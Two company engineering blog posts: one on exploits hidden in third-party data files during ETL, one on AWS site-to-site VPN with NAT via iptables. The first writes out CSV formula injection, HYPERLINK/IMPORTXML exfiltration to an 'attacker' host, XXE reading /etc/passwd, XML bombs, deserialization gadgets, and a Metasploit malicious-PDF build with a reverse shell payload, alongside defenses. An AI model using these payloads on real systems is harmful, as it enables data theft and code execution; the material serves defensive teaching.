DEV Community: Smarking

Beware of Exploits in ETL

Smarking — Tue, 27 Apr 2021 18:17:00 +0000

Exploits in Data Files

At Smarking we receive data from third-party vendors. This data comes in various formats: XML, CSV, Excel, PDF, and JSON, and we use an Extract-Transform-Load (ETL) process to store the data in our database. This kind of ETL process is used by many organizations that ingest data from external sources. What are the security considerations pertaining to this process?

The security issue is that a third party may unintentionally provide data laden with exploits. This can happen if the third party accumulates but does not filter free-form data submitted by users. Such data may include names, street addresses or free-form descriptions. The exploits would be innocuous at rest but would weaponize once data is extracted for manual viewing.

For instance, if a cell in a CSV file starts with an equal sign (=), Excel interprets the cell as a formula to be executed. Consider this CSV:

Date,First Name,Last Name
2020-07-25,John,Smith
2020-07-25,Marry,Poppins
2020-07-25,"=2+5", Math

Unfortunately, quotes around the cell value do not help to neutralize this effect. Both the Apple Numbers and Microsoft Excel apps would render the rogue cell as "7," despite the quoted "=2+5". In addition, the following characters can trigger formula evaluation: +, -, @. The rendered table would look like this:

Date	First Name	Last Name
2020-07-25	John	Smith
2020-07-25	Marry	Poppins
2020-07-25	7	Math

Formulas can also run external commands in the underlying operating system. For example, each of these CSV lines would launch the external calculator program calc.exe:

...,=DDE("cmd";"/C calc";"__DdeLink_60_870516294"),...
...,=cmd|' /C calc'!A0,...
...,"=2+5+cmd|' /C calc'!A0",...
...,@SUM(cmd|'/c calc' !A0),...

There would be warnings from Excel before running external commands, but attackers rely on users' tendency to ignore security warnings in files downloaded from trusted sources.

Special functions that create hyperlinks allow attackers to steal data from a CSV file. If a CSV file contains the following value in a cell, then upon opening it in Excel a user would see a link with the text "Error: please click for further information" in the corresponding cell inside the app. Upon clicking the link, he would submit the contents of cells A10 and A11 to the attacker. Those cells may contain sensitive information, such as payment details.

...,=HYPERLINK("http://attacker?leak="&A10&A11,"Error: please click for further information"),...

The Google Sheets web app is not immune to such attacks either. For instance, the IMPORTXML(url, xpath) function fetches data from the provided URL and inserts it into the current sheet. Consider what would happen when importing the following CSV into Google Sheets:

...,"=IMPORTXML(CONCAT(""http://attacker?v="", CONCATENATE(A2:E2)), ""//a"")",...

The result would be that data in the 2nd row of the spreadsheet spanning cells A2 through E2 would be submitted to the attacker.

But it gets worse. The URL could also be another spreadsheet in your account. By using this technique twice the attacker can exfiltrate data from any other spreadsheet in your Google Docs account if he knows its URL.

A suggested workaround for these attacks is to prefix every cell that starts with one of the special characters =, +, -, or @ with a tab character. This neutralizes the attacks when the data is viewed in Excel and other spreadsheet apps. Note, however, that the data is then no longer in its original form.
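The tab-prefix workaround can be sketched in a few lines of Python. This is a minimal illustration rather than our production code: the helper names neutralize_cell and neutralize_csv are made up for this example, and only the standard csv module is used.

```python
import csv
import io

# Characters that spreadsheet apps may treat as the start of a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@")

def neutralize_cell(value: str) -> str:
    """Prefix a tab to any cell that starts with a formula trigger."""
    if value.startswith(FORMULA_TRIGGERS):
        return "\t" + value
    return value

def neutralize_csv(text: str) -> str:
    """Rewrite CSV text so that no cell starts with a formula trigger."""
    reader = csv.reader(io.StringIO(text))
    out = io.StringIO()
    writer = csv.writer(out, lineterminator="\n")
    for row in reader:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return out.getvalue()
```

Note that this sketch also prefixes legitimate values such as negative numbers ("-5"), so it is best applied only to reports meant for manual viewing, not to data that other programs will parse.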

Also, PDF files are widely used to export reports from administrative websites. If you use libraries like tabula-py to extract CSVs from such PDFs, then the extracted data can contain the exploits mentioned earlier.

Full control of data file generation

So far we have looked at the situation in which data contains latent exploits in a regular data file. However, if an attacker can manufacture a data file in full, then he can do far more damage. The challenge for him, however, is to deliver such a file to the victim.

If you receive data files from third parties, then a failure to authenticate the sender exposes you to phishing attacks. If you are receiving data files by email, you may be getting them from an impostor. If you are receiving files by submission to your API, ensure that the third party is using an authentication token. If you are downloading data from a third party, verify its SSL certificate even if the third party is using a self-signed one. (For tips on how to do that, read our earlier Smarking blog post.)

The attacker can also gain control of the data file generation code. This can be accomplished by poisoning public code repositories. The simplest such attack is publishing misspelled variants of popular packages in the hope that users install them by accident. For instance, in 2018 a researcher found a malicious package 'dajngo' in Python's PyPI repository, an intentional misspelling of the popular package 'django.'

By infecting generated data files rather than the system hosting malicious code the attacker delays detection. A malicious data file can introduce a discrepancy into ETL which may be manually reviewed only weeks later. The malicious data file would be downloaded and opened by the victim, thereby infecting his system. Thus, API exploits can infect hundreds if not thousands of API consumers until the issue is identified at the API source. Each infection could open a reverse tunnel to the attacker creating a pivot for further network infiltration.

Excel files

Much like CSV files, Excel files are subject to formula-based exploits. But in addition to that, attackers can do more tricks with an Excel file. A single Excel file can encode multiple worksheets some of which may be hidden. Excel files can also specify font size and font color for particular cells and this feature can be used to hide values by using a white font. The cells have a specific data type associated with them.

Since version 4.0, Excel has supported another kind of macro, known as XL4 macros. While standard formulas are limited to workbook-related calculations, XL4 macros allow extensive, Turing-complete programming. In order to work, they must reside on a macro-enabled sheet.

There are other behavioral differences between a CSV file and an Excel file. An Excel file opens automatically in the Excel app when double-clicked, but a CSV file opens in the default spreadsheet app on the user's system (for example, the Numbers app on a Mac). Excel files may also come from an older version of Excel, in which case the installed Excel app would attempt to import them. This variety of behaviors creates a larger attack surface for Excel data files than for CSV files.

Security at VMware surveyed XL4 exploits in the wild and presented a report in November of 2020. They demonstrate how the macros can be used to download files from the internet, to execute PowerShell scripts, and change the Windows registry.

The XL4 macro sequence begins to run from a cell immediately under a cell labeled Auto_Open and descends lower and lower until there are no more cells with commands. A =GOTO statement can direct the program flow to any cell. Combined with FORMULA.FILL which can write any value into a cell (including an = command), the GOTO can be directed to jump to a dynamic location. This allows you to implement flow control such as loops and if statements, making the attacker's script Turing complete.

The attackers can obfuscate their code so that it does not look like a program. The GOTO jumping function can be used to obfuscate code by scattering it all over the spreadsheet, including cells not in view. White font can make the cells appear blank. Dynamic code can be generated at run-time by deobfuscating data in cells and converting them into code. Code can also be downloaded from the Internet at runtime, then pasted into a temporary cell and executed.

As stated earlier, XL4 macros must reside on a macro-enabled sheet in order to work. Security measures are already in place to alert users to the presence of such sheets. However, an attacker can prepare an Excel file without the macro designation and try to trick the user into enabling it manually. Excel documents of this kind have been observed in the wild.

XML, JSON and YAML

XML files can be exploited through the Document Type Definition (DTD). A <!DOCTYPE ...> declaration can define external entities, which cause XML parsers to load files from the file system and to generate HTTP requests. For instance, the following XML file instructs the parser to load a local file and insert it into the document body:

<!DOCTYPE external [
<!ENTITY ee SYSTEM "file:///PATH/TO/simple.xml">
]>
<root>&ee;</root>

If the attacker could trigger an error that the XML parser reports back to him, then the contents of the file might be included in the error message, thereby leaking data to the attacker. Changing the file:// URL to an http:// one, such as http://example.com/foo.xml, would load a remote file from the Internet.

Using these techniques an attacker could steal data or perform a Server-Side Request Forgery (SSRF) attack to bypass firewalls. The following XML and DTD combination sends the contents of the /etc/passwd file to the attacker:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
 <!ENTITY % file SYSTEM "file:///etc/passwd">
 <!ENTITY % dtd SYSTEM "http://attacker/evil.dtd">
 %dtd;
]>
<root>&send;</root>

where the evil.dtd file is:

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://example.com/?%file;'>">
%all;

The attacker can also cause a Denial of Service attack by loading a large file:

<?xml version="1.0"?>
<!DOCTYPE root [
 <!ENTITY file SYSTEM "http://attacker/huge.xml" >
]>
<root>&file;</root>

Entity expansion can be used to occupy gigabytes of memory with a short XML document. The following scheme expands to an amount of memory that grows exponentially with the number of lines used:

<!DOCTYPE xmlbomb [
<!ENTITY a "1234567890" >
<!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;">
<!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;">
<!ENTITY d "&c;&c;&c;&c;&c;&c;&c;&c;">
]>
<bomb>&d;</bomb>
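The growth can be checked with a little arithmetic. The sketch below computes the expanded size when every entity level repeats the previous level a fixed number of times; the function name expanded_length is ours and does not come from any library.

```python
def expanded_length(base_length: int, fanout: int, levels: int) -> int:
    """Size in characters of the top-level entity after full expansion."""
    return base_length * fanout ** levels

# The example above: a 10-character base entity (a), 8 references per level,
# and 3 levels of nesting (b, c, d).
print(expanded_length(10, 8, 3))    # 5120

# Ten levels at the same fan-out need only seven more lines of XML.
print(expanded_length(10, 8, 10))   # 10737418240, i.e. more than 10 GB
```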

Many XML processing libraries can parse gzip compressed streams. Some of these libraries are also vulnerable to compression bombs (1GB of zeros can be compressed to a 1MB data stream).
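One way to guard against compression bombs is to decompress the stream yourself with a hard cap on the output size before handing the result to a parser. The following is a minimal sketch using Python's standard zlib module; the function name, the exception class, and the choice of limit are assumptions made for this example.

```python
import gzip
import zlib

class DecompressionLimitExceeded(ValueError):
    """Raised when a gzip stream expands beyond the allowed size."""

def bounded_gunzip(data: bytes, limit: int) -> bytes:
    """Decompress gzip data, refusing to produce more than `limit` bytes."""
    # MAX_WBITS | 16 tells zlib to expect a gzip header and trailer.
    decompressor = zlib.decompressobj(zlib.MAX_WBITS | 16)
    # Ask for at most limit + 1 bytes; zlib stops producing output at that point.
    output = decompressor.decompress(data, limit + 1)
    if len(output) > limit:
        raise DecompressionLimitExceeded(f"output exceeds {limit} bytes")
    return output
```

A caller would pick the limit from the largest legitimate file it expects, for example bounded_gunzip(payload, 50 * 1024 * 1024).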

In addition, XML parsers have vulnerabilities that are triggered by malformed XML documents. For instance, a large number of unclosed nested XML tags, as shown below, would exhaust the computer's resources.

<A1>
 <A2>
  <A3>
   ...
    <A30000>

Unfortunately, XML libraries across various languages do not handle such attacks by default. The Python lxml library would dutifully load a local file from the filesystem, and the xmlrpc library would be subject to the memory blowup attack. However, there are specialized libraries, such as defusedxml, that handle such attacks correctly. Use these libraries when working with untrusted data.
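Where a dedicated hardened library is not available, a rough approximation is to reject any document that carries a DOCTYPE before parsing it, since all of the entity-based attacks above depend on one. The sketch below uses only Python's standard library; the names parse_untrusted_xml and ForbiddenDTDError are invented for this example, and the approach is deliberately strict (it refuses harmless DTDs too) and does not limit nesting depth.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

class ForbiddenDTDError(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""

def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # Called by expat as soon as it sees "<!DOCTYPE ...".
    raise ForbiddenDTDError(f"DOCTYPE {name!r} is not allowed in untrusted XML")

def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse XML only if it declares no DTD (and therefore no entities)."""
    # First pass: scan the document with a bare expat parser that aborts on a DTD.
    scanner = expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = _reject_doctype
    scanner.Parse(data, True)
    # Second pass: the document has no DTD, so build the tree as usual.
    return ET.fromstring(data)
```

Parsing the document twice costs some time, but it keeps the check independent of which tree-building library is used afterwards.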

If you are writing an XML parser yourself, use the following guidelines to limit the attack surface: limit parse depth, limit parse time, skip DTDs, and do not expand entities. Also, do not run XPath expressions or apply XSL transformations received from untrusted sources.

Many APIs expect and return data in JSON or XML formats which contain records as key-value maps. The records are then stored in a database that accumulates many records. Whenever the records are exported from the database into a CSV report for analysis, the resulting files can carry the attacks that we have already seen.

Rogue content can get into JSON and XML through an injection attack. This attack is similar to the familiar SQL injection but it operates on JSON and XML. The following would be an unsafe way to build a JSON document containing a password:

json = `{..., "password":"${password}"}`

That is because a password can have quotes, commas, and colons inside it, arranged to generate new keys in the resulting JSON. Instead, use a library that would properly escape values.
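The difference between the two approaches is easy to demonstrate. The following Python sketch builds the same document by string formatting and with the standard json module; the field names and the sample password are made up for illustration.

```python
import json

def build_unsafe(password: str) -> str:
    """Build JSON by string formatting: the value is not escaped."""
    return '{"user": "alice", "password": "%s"}' % password

def build_safe(password: str) -> str:
    """Build JSON with a serializer that escapes the value."""
    return json.dumps({"user": "alice", "password": password})

# A "password" crafted to close the string and add a new key.
malicious = 'x", "role": "admin'

print(json.loads(build_unsafe(malicious)))
# {'user': 'alice', 'password': 'x', 'role': 'admin'}

print(json.loads(build_safe(malicious)))
# {'user': 'alice', 'password': 'x", "role": "admin'}
```

In the unsafe version the attacker gains a "role" key; in the safe version the whole string remains the password.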

Many languages have libraries to save, or serialize, objects in JSON, XML, and YAML files and to restore them later in a process called "deserialization." By design, this means that data files embed the names of objects' types and the objects' states. Thus, if an attacker could cause deserialization of rogue data, he could gain remote code execution. For instance, loading the following YAML file with Python's yaml.load and an unsafe loader would create a new object of type Foo with the name parameter "Bar."

!!python/object:__main__.Foo {name: Bar}

Python's YAML library is one of many data loaders that have a secondary ability to deserialize objects. A 2017 study [Bechler] cataloged dozens of Java libraries vulnerable to such deserialization attacks. The study reported that if the following file is parsed by Java's XMLDecoder, it creates the object specified by the attacker and calls a method on it. In the following example, it first creates a ProcessBuilder object and then calls its start method, which runs the external command /usr/bin/gedit.

<new class="java.lang.ProcessBuilder">
  <string>/usr/bin/gedit</string>
  <method name="start" />
</new>

Also, the same study showed that a vulnerability in Apache Camel's SnakeYAML integration (CVE-2017-3159) allowed an attacker to run arbitrary scripts inside Java's ScriptEngine object:

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://attacker/"]
  ]]
]

PDF Files

Much like MS Office files, PDF files are notorious delivery vehicles for exploits. For instance, last September a use-after-free bug was discovered in a cache data structure used by Adobe Reader. It led to the code execution exploit CVE-2020-9715.

PDF files have a large attack surface. They can contain JavaScript, which powers PDF-based forms. Also, the PDF standard allows embedding arbitrary file attachments, making a PDF document equivalent to an uncompressed "zip" file. Using such attachments, the attacker can easily embed exploit payloads inside the PDF and then extract them using a small amount of embedded JavaScript. For instance, the CVE-2018-8414 exploit used this technique to embed XML files into a PDF.

It is simple to embed files inside a PDF. The following command attaches data.bin, a file containing raw binary data, to page 27 of a PDF document:

$ pdftk manual.pdf attach_files data.bin to_page 27 output manual_plus.pdf

For security reasons, modern PDF readers do not automatically execute embedded JavaScript. But in 2010 security researcher Didier Stevens found that it is possible to launch an external program with the /Launch /Action command sequence and thereby gain code execution in the host operating system. Acrobat Reader showed a warning, but Didier found a way to alter the message text in order to trick users into ignoring it.

You can replicate Didier's technique using Metasploit, a security researcher's tool which attackers also use. Didier's technique was implemented as Metasploit module adobe_pdf_embedded_exe_nojs, whose documentation states:

This module embeds a Metasploit payload into an existing PDF file in a non-standard method. The resulting PDF can be sent to a target as part of a social engineering attack. [It] does not require JavaScript to be enabled and ... [the] EXE is embedded in the PDF in a non-standard method using HEX encoding. Target: Adobe Reader <= v9.3.3 (Windows XP SP3 English)

Although this particular exploit is non-viable for current versions of PDF readers, the approach can be reused in future exploits. In addition, Metasploit has other PDF exploits:

> search type:exploit platform:windows name:pdf
... exploit/windows/fileformat/foxit_reader_uaf   ...   2018-04-20

A possible defense against PDF exploits is to preprocess all untrusted PDF files and strip everything but the static content inside the PDF. This can be accomplished with the following Ghostscript command:

$ gs -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sOUTPUTFILE=clean.pdf original.pdf

Note that this does not make copyable text inside the PDF uncopyable. A discussion on Stack Overflow suggests adding options to downsample any embedded images to remove exploits that utilize flaws in image processing libraries.

A simple text search inside the PDF file would not find all suspicious active components because attackers obfuscate them. Instead, one can use Didier's tool pdfid to triage PDF documents and to analyze the suspicious ones with his pdf-parser tool.
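To see why a plain text search falls short, consider that the PDF format lets any character of a name be written as a #xx hexadecimal escape, so /Launch can be spelled /La#75nch. The sketch below is a toy triage function that undoes this one obfuscation before counting risky names. It is not a substitute for pdfid: the function names and the list of names are our own choices, and the sketch does not look inside compressed streams.

```python
import re

# Names that often indicate active content (a subset of what pdfid reports).
RISKY_NAMES = (b"/JS", b"/JavaScript", b"/AA", b"/OpenAction", b"/Launch", b"/EmbeddedFile")

def decode_name_escapes(data: bytes) -> bytes:
    """Replace #xx hexadecimal escapes with the bytes they stand for."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)

def count_risky_names(data: bytes) -> dict:
    """Count occurrences of risky PDF names after undoing #xx escapes."""
    normalized = decode_name_escapes(data)
    counts = {}
    for name in RISKY_NAMES:
        # The lookahead keeps /JS from matching a longer name such as /JSFoo.
        pattern = re.escape(name) + rb"(?![A-Za-z0-9])"
        counts[name.decode()] = len(re.findall(pattern, normalized))
    return counts
```

For example, count_risky_names(open("malicious.pdf", "rb").read()) would return a dictionary of counts that can be compared with the pdfid output.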

The following example shows how to generate a malicious PDF and then neutralize it:

$ msfconsole
msf6 > use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe_nojs) > set lhost 1.2.3.4
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe_nojs) > set filename malicious.pdf
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe_nojs) > exploit
...
$ gs -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sOUTPUTFILE=clean.pdf malicious.pdf
$ python pdfid.py malicious.pdf > malicious.txt
$ python pdfid.py clean.pdf > clean.txt
$ diff --width 80 --side-by-side malicious.txt clean.txt
PDFiD 0.2.7 malicious.pdf             | PDFiD 0.2.7 clean.pdf
 PDF Header: %PDF-1.5                 |  PDF Header: %PDF-1.7
 obj                    5             |  obj                    7
 endobj                 5             |  endobj                 7
 stream                 0             |  stream                 2
 endstream              0             |  endstream              1
 xref                   1                xref                   1
 trailer                1                trailer                1
 startxref              1                startxref              1
 /Page                  1(1)          |  /Page                  1
 /Encrypt               0                /Encrypt               0
 /ObjStm                0                /ObjStm                0
 /JS                    0                /JS                    0
 /JavaScript            0                /JavaScript            0
 /AA                    0                /AA                    0
 /OpenAction            1(1)          |  /OpenAction            0
 /AcroForm              0                /AcroForm              0
 /JBIG2Decode           0                /JBIG2Decode           0
 /RichMedia             0                /RichMedia             0
 /Launch                1(1)          |  /Launch                0
 /EmbeddedFile          0                /EmbeddedFile          0
 /XFA                   0                /XFA                   0
 /Colors > 2^24         0                /Colors > 2^24         0

Final Thoughts

We have seen that the attack surface of data processing libraries differs from the attack surface of data viewing applications. There is a fundamental difference between data for machines and data for people. We have also seen that if the attacker can fully control the data file creation, then he can cause much more damage.

When working with data received from a third party it is not known how well the third party checks data submitted by its users. The first step to protect yourself from exploits is to drop superfluous elements from a third party's data during the transformation stage of the ETL process. For instance, if fields titled "Description" and "Street Address" are not needed, then they can be filtered out on import.

Filter out unnecessary characters from fields. A street address does not need to have =, +, @ characters, and most data values never need to begin with those characters. When exporting data from your own database into CSV and PDF reports for manual viewing, simplify the data by removing all unusual characters since the report need not have data in the precise original form.
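The two filtering steps above can be sketched as a small transformation function. This is an illustration under stated assumptions, not our actual ETL code: the field allowlist, the set of permitted characters, and the function names are hypothetical and would need tuning for real data. It is meant for free-text fields only, since it would also strip the sign from a negative number.

```python
import re

# Hypothetical allowlist: only the fields that the downstream report needs.
ALLOWED_FIELDS = ("Date", "First Name", "Last Name")

# Characters kept in a value; everything else (including =, + and @) is dropped.
UNSAFE_CHARS = re.compile(r"[^A-Za-z0-9 .,:/_-]")

# Characters that must not start a value.
LEADING_TRIGGERS = "=+-@ \t"

def clean_value(value: str) -> str:
    """Drop unusual characters, then strip leading formula triggers."""
    return UNSAFE_CHARS.sub("", value).lstrip(LEADING_TRIGGERS)

def transform(record: dict) -> dict:
    """Keep only allowlisted fields and clean their values."""
    return {
        field: clean_value(str(record[field]))
        for field in ALLOWED_FIELDS
        if field in record
    }
```

With this sketch, a record whose "Description" field contains an exploit loses that field entirely, and a "First Name" of "=2+5" becomes the harmless "25".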

Anonymize datasets to remove Personally Identifiable Information (PII). This further reduces the attack surface because any user-submitted values are replaced by anonymized equivalents.

Finally, use virtual machines when opening unsafe files. VirtualBox or remote instances on AWS can be used for working with unsafe data files. As of 2021, AWS supports both Windows and macOS virtual workstations. Running ETL jobs in Docker also helps prevent exploits from escaping into the underlying operating system.

At Smarking, we ingest millions of records from parking vendors and we use such techniques to fend off exploits.

Additional Reading

[Mauer] "The Absurdly Underestimated Dangers of CSV Injection," George Mauer, 2017
[OWASP] "XML Security Cheat Sheet," OWASP
[Bechler] "Java Unmarshaller Security: Turning your data into code execution," Moritz Bechler, 2017

AWS Site-to-Site VPN with NAT

Smarking — Fri, 22 Jan 2021 05:18:28 +0000

At Smarking, we use the Amazon Web Services (AWS) infrastructure. We help organizations improve the efficiency of parking lots, and to do that we need to communicate with their computing systems. However, these organizations, which include hospitals and universities, often run closed private networks. Outside vendors like us may access those networks only through an IPSec-based VPN.

Is it possible to create an IPsec tunnel from an AWS Virtual Private Cloud (VPC) to a network outside of AWS? The use case that AWS supports well is connecting your own on-premises network with the VPC. Thus, in naming components, AWS uses the term "Customer Network" to designate your on-premises network. You are the customer of AWS.

Also, because you are the administrator of your on-premises network, AWS does not expose extensive logs that would allow you to troubleshoot the establishment of the IPSec tunnel. Instead, AWS assumes that you would be able to inspect the logs on the side of the on-premises network.

But what if you wished to create an IPSec tunnel from your VPC to a third party network, one which is beyond your administrative control? In particular, you may not control the CIDR policy of the third party network. A third party may require that you place your network on a specific CIDR, or that you use publicly addressable IP addresses.

To support creating IPsec tunnels, AWS has for many years offered a specialized solution called a Virtual Private Network (VPN). In recent years, AWS supplemented it with a more generic solution called a Transit Gateway (TGW). The VPN solution requires that the customer's network does not conflict with your CIDR. Unless you are willing to change the IP addresses inside your VPC to meet that requirement, you need to use Network Address Translation (NAT). This can be accomplished by creative use of the Transit Gateway.
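Whether two networks conflict can be checked before any AWS resources are created. The following sketch uses Python's standard ipaddress module; the helper name cidrs_conflict is ours, and the CIDRs are the example values used in this post.

```python
import ipaddress

def cidrs_conflict(ours: str, theirs: str) -> bool:
    """Return True if the two CIDR blocks share any address."""
    return ipaddress.ip_network(ours).overlaps(ipaddress.ip_network(theirs))

# Our VPC against the customer's network: no conflict.
print(cidrs_conflict("20.0.0.0/16", "172.31.0.0/16"))    # False

# A VPC that happens to use the same range as the customer: conflict.
print(cidrs_conflict("172.31.0.0/16", "172.31.38.0/24"))  # True
```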

Below is the network layout that illustrates the key idea. Assume that the AWS VPC has the subnet 20.0.0.0/16, the customer's network is on the 172.31.0.0/16 subnet, and that the customer wants us to use a public IP subnet. (We use AWS' terminology of "customer" to refer to a third party.) But, instead of using a public IP subnet, we will use NAT to map all EC2 instances to the single Elastic public IP 1.2.3.4.

Inside our VPC we create a subnet 20.0.6.0/24 whose sole purpose is to contain a NAT gateway EC2 instance ("NAT GW" in the diagram) that would perform the NAT operation. Note that AWS has a built-in component called "NAT gateway," but here we run our own EC2 instance that performs this function using Linux and iptables packet filter.

The rest of the EC2 instances in our VPC live in separate subnets. The routing tables in those subnets forward packets that are destined to the customer's side to the Elastic Network Interface (ENI) of the NAT gateway instance.

The subnet in which the NAT gateway lives has a routing table that forwards packets destined for the customer to the Transit Gateway. By this time, however, the source address of these packets is the public IP 1.2.3.4 because the packets have already been translated by NAT. Unlike the more basic Virtual Private Network AWS component, the Transit Gateway AWS component does not place any restrictions on the source address of the packet.

The Transit Gateway has a routing table that tells it where to send the packets next. Packets destined for the customer's side are forwarded to the "Site-to-Site VPN" AWS component. This is the component that has all the IPsec tunnel options. In particular, it lists the end-point IPs on the AWS side and the customer's side. Note that AWS only allows us to specify the end-point IP on the customer's side and automatically picks a public IP on its own side. (We have no control over this IP address.)

If the Site-to-Site VPN component can establish the IPsec connection, then upon receiving the packets from the Transit Gateway, it forwards them through the tunnel. The customer sees 1.2.3.4 as the source IP of the packets, and the customer's routing table directs packets destined for 1.2.3.4 back into the tunnel.

Returning Packets

So far we have discussed how the packets originating at a test EC2 instance in our VPC make their way to the customer's side. Now let's see the process in the opposite direction. Once the Site-to-Site VPN connection receives a packet destined for the 1.2.3.4 IP address, it forwards it to the Transit Gateway (TGW). The routing table of the TGW directs such packets to the particular subnet inside the VPC where the NAT GW instance runs.

Once the packet arrives in that subnet, a specific entry in the subnet's routing table tells the subnet's router to forward the packet to the Elastic Network Interface (ENI) of the NAT gateway instance. The NAT instance picks up the packet and de-NATs its destination back into the 20.0.0.0/16 network address space. Then, it dispatches the modified packet and AWS forwards it to the test EC2 instance.
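The forward and return translations can be modeled with a toy simulation. The sketch below is not how Linux connection tracking is implemented (real tracking also keys on protocol, ports, and ICMP identifiers); it only illustrates the address rewriting, and the class and method names are invented for this example.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Packet:
    src: str
    dst: str

class NatInstance:
    """Toy model of the NAT gateway instance."""

    def __init__(self, public_ip: str):
        self.public_ip = public_ip
        # Simplified connection table: remote host -> original private source.
        self.connections = {}

    def outbound(self, packet: Packet) -> Packet:
        """SNAT: remember the private source, then present the public IP."""
        self.connections[packet.dst] = packet.src
        return Packet(src=self.public_ip, dst=packet.dst)

    def inbound(self, packet: Packet) -> Packet:
        """De-NAT: restore the private address of the original sender."""
        original_src = self.connections[packet.src]
        return Packet(src=packet.src, dst=original_src)

nat = NatInstance("1.2.3.4")
sent = nat.outbound(Packet(src="20.0.5.210", dst="172.31.38.197"))
reply = nat.inbound(Packet(src="172.31.38.197", dst="1.2.3.4"))
print(sent)   # Packet(src='1.2.3.4', dst='172.31.38.197')
print(reply)  # Packet(src='172.31.38.197', dst='20.0.5.210')
```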

Configuration of the Linux NAT instance

For the NAT gateway instance to pick up packets that do not have its IP address in their destination header, AWS must be told to disable the "source/destination check." This can be done in the AWS Console EC2 “Instances” view: right-click on the instance to bring up a popup menu, then select “Networking” → “Change source destination check” and disable the check.

Also, we must tell Linux to forward such packets, which is done (as root) with this command:

$ echo 1 > /proc/sys/net/ipv4/ip_forward

Assuming that the local IP address of the NAT instance is 20.0.6.195, these iptables commands set up the NAT operation:

$ iptables -t nat -F
$ iptables -t nat -A POSTROUTING -d 172.31.0.0/16   -j SNAT --to-source 1.2.3.4
$ iptables -t nat -A PREROUTING  -d 1.2.3.4 -j DNAT --to-destination 20.0.6.195

To handle additional customer networks we may add more SNAT lines. For example, for a customer network with CIDR 192.168.0.0/16 we would add this rule:

$ iptables -t nat -A POSTROUTING -d 192.168.0.0/16   -j SNAT --to-source 1.2.3.4

If there was another customer who wanted to see our instances coming from a different address space, then we would also add additional DNAT lines. For example, if a customer on network 10.0.0.0/16 wanted our traffic to appear as if it's coming from 10.1.0.0/16, then we could: (a) SNAT all outgoing packets to an IP address on that CIDR, for instance 10.1.0.1, and (b) DNAT them back to 20.0.6.195 upon return.



$ iptables -t nat -A POSTROUTING -d 10.0.0.0/16   -j SNAT --to-source 10.1.0.1
$ iptables -t nat -A PREROUTING  -d 10.1.0.1 -j DNAT --to-destination 20.0.6.195

(In addition to updating the NAT rules, we would also need to update the AWS infrastructure as specified by the diagram: to add entries to subnet routing tables and to create additional Site-to-Site VPN connections and associate them with the Transit Gateway.)
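When the number of customers grows, the rule pairs can be generated rather than typed by hand. The following is a small sketch, assuming one presented IP per customer network; the function name nat_rules is ours, and the ipaddress module is used only to reject malformed input before it reaches a shell.

```python
import ipaddress
from typing import List

def nat_rules(customer_cidr: str, presented_ip: str, nat_instance_ip: str) -> List[str]:
    """Return the SNAT/DNAT iptables commands for one customer network."""
    # Each call raises ValueError if the input is not a valid CIDR or address.
    network = ipaddress.ip_network(customer_cidr)
    presented = ipaddress.ip_address(presented_ip)
    instance = ipaddress.ip_address(nat_instance_ip)
    return [
        f"iptables -t nat -A POSTROUTING -d {network} -j SNAT --to-source {presented}",
        f"iptables -t nat -A PREROUTING -d {presented} -j DNAT --to-destination {instance}",
    ]

for rule in nat_rules("10.0.0.0/16", "10.1.0.1", "20.0.6.195"):
    print(rule)
```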

Testing

We can test our setup by simulating a customer network, using an AWS tutorial to create a StrongSwan Linux VPN. We create another VPC to represent the "customer's" side and set its CIDR to 172.31.0.0/16. Then we follow the tutorial to create a StrongSwan Linux instance in it. We create another test EC2 instance in the same VPC and configure the routing table of the VPC to forward packets with destination 20.0.0.0/16 to the Elastic Network Interface (ENI) of the StrongSwan instance. Also, we assign a public IP to the StrongSwan instance.

Returning to our main VPC, we create a Site-to-Site VPN connection and set the public IP of the StrongSwan instance as the destination. We set the rest of the configuration as advised by the tutorial and wait until the first tunnel shows that it is in the UP state.

The tutorial advises using Border Gateway Protocol (BGP) when creating a Site-to-Site VPN connection. Once the tunnel is set up, BGP automatically configures the StrongSwan instance with a route to the 20.0.0.0/16 subnet. However, our packets will arrive with 1.2.3.4 as the source address, so the BGP routing table would not know where to send the returning packets. To fix this, we connect to the StrongSwan instance and edit /etc/quagga/zebra.conf, the configuration file of the BGP daemon Zebra, to add a static route:

ip route 1.2.3.4/32 169.254.152.245

Then, we restart the BGP daemon with the service zebra restart command. Note that the IP address 169.254.152.245 in the above configuration line is the "Inside IP Address" of the Virtual Private Gateway of one of the two IPsec tunnels that the Site-to-Site VPN Connection created. You will have a different address, which you can look up from the Generic Configuration text file that can be downloaded from the Site-to-Site VPN Connection screen of the AWS console.

Next, we connect to the test EC2 instance at 20.0.5.210 in our VPC and ping the test instance in the customer's 172.31.0.0/16 subnet:

[ec2-user@ip-20-0-5-210 ~]$ ping 172.31.38.197  > /dev/null & sudo tcpdump -eni any icmp
15:49:14.787108 Out ... 20.0.5.210 > 172.31.38.197: ICMP echo request, ...
15:49:14.854690  In ... 172.31.38.197 > 20.0.5.210: ICMP echo reply ...

We can also observe the traffic flowing through the NAT gateway instance:



ec2-user@ip-20-0-6-20:~$ sudo tcpdump -eni any icmp
20:39:46.084613  In … 172.31.38.197 > 1.2.3.4: ICMP echo request, id 26627, seq 1 ...
20:39:46.084657 Out … 1.2.3.4 > 172.31.38.197: ICMP echo reply, id 26627, seq 1 ...

